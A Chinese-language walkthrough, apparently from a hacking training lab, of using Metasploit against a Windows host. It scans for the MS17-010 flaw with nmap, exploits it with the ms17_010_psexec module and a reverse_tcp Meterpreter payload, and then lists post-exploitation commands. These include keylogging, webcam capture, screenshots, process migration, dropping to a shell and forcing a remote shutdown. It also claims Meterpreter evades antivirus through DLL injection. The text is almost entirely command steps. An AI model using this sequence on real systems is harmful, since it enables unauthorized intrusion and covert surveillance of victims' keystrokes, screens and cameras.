meterpreter简介
meterpreter的隐藏性特性可以使其躲开众多杀毒软禁啊以及基于主机入侵检测系统的检测。通过DLL注入方式,meterpreter可以附加到不同的进程上,它可以在这些进程之间进行切换。
基础使用
我们获取到的shell只是基础的情报收集。
有时候会限制我们的操作。
目标电脑
使用nmap进行ms17-010的漏洞判断
nmap --script=smb-vuln-ms17-010 192.168.30.133
使用msf
使用辅助模块
设置参数
结果
搜索ms17_010的漏洞利用
use exploit/windows/smb/ms17_010_psexec
查看参数
show options
执行
exploit
exploit模块选择错误,(系统是32位)
只能重新选择了
get到shell,使用payload是
payload windows/x64/meterpreter/reverse_tcp
获得目标shell
meterpreter功能使用
获取系统ID及计算机名称
getuid
获取当前进程
ps
打开记事本
终止进程
kill <PID>
获取当前进程标识符
getpid
获取当前meterpreter桌面
getdesktop
开启键盘记录
keyscan_start
终止键盘记录
keyscan_stop
转存从主机捕获的按键记录
keysscan_dump
捕获摄像头命令
webcam_snap
获取主机shell
shell
截取屏幕
screenshot
迁移进程
migrate <PID>
查看帮助信息
help或者?
shutdown -s -t 15 -c "this is hacking training"